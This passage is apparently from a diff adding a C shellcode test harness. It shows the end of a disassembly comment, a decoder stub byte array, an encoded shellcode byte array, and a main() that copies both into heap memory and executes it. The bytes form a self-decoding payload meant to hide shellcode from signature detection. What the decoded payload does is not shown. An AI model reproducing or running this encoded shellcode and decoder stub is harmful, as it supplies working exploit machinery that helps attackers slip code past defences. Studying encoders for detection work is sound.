+ 80480d3: 04 3b add al,0x3b
+ 80480d5: ce into
+ 80480d6: b6 4a mov dh,0x4a
+ 80480d8: af scas eax,DWORD PTR es:[edi]
+ 80480d9: 53 push ebx
+ 80480da: 59 pop ecx
+ 80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
+ 80480dc: b5 05 mov ch,0x5
+ 80480de: f7 30 div DWORD PTR [eax]
+ 80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
+ 80480e5: 60 pusha
+ 80480e6: e4 10 in al,0x10
+ 80480e8: 7d cc jge 80480b6
+ 80480ea: 56 push esi
+ 80480eb: cc int3
+ 80480ec: aa stos BYTE PTR es:[edi],al
+****************************************************/
+
+#include
+#include
+#include
+
+unsigned char stub[] = \
+"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
+
+unsigned char shellcode[] = \
+"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
+
+unsigned char* code;
+
+main()
+{
+ printf("\nStub Length: %d\n", strlen(stub));
+ printf("Shellcode Length: %d\n\n", strlen(shellcode));
+
+ printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));
+
+ code = malloc(strlen(stub) + strlen(shellcode));
+ memcpy(code, stub, strlen(stub));
+ memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+}
\ No newline at end of file